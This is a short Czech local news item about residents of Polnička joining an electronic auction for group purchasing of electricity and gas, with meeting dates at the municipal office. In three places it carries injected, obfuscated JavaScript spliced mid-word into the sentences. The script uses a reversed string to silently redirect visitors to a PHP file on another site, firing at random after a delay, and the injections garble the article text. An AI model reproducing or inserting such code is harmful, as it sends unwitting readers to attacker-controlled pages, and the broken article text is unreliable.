Polnička, e-aukce
Rainbow page separator

Obyvatelé Polničky se mohou účastnit e-aukce

Neděle, 4. května 2014

Polnička / Do elektronické aukce na sdružený nákup elektrické energie a zemního plynu pro své domácnosti se mají možnost zapojit obyvatelé Polničky, a [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to prostřednictvím společnosti Terra Group Investment.
Pomocí spojeného nákupu ve formě interne[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tové dražby pro co nejvíce domácností tak mohou jednotlivé rodiny ušetřit finanční náklady vynaložené na energie ve výši až pětadvacet procent.
Zájemci o ten[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to způsob nákupu energií se mohou se zástupcem společnosti setkat v pondělí 5. května a rovněž ve středu 7. května v polničském obecním úřadě. Veškeré dostupné informace o elektronické aukci jim po oba dny budou k dispozici v době od 15 do 18 hodin.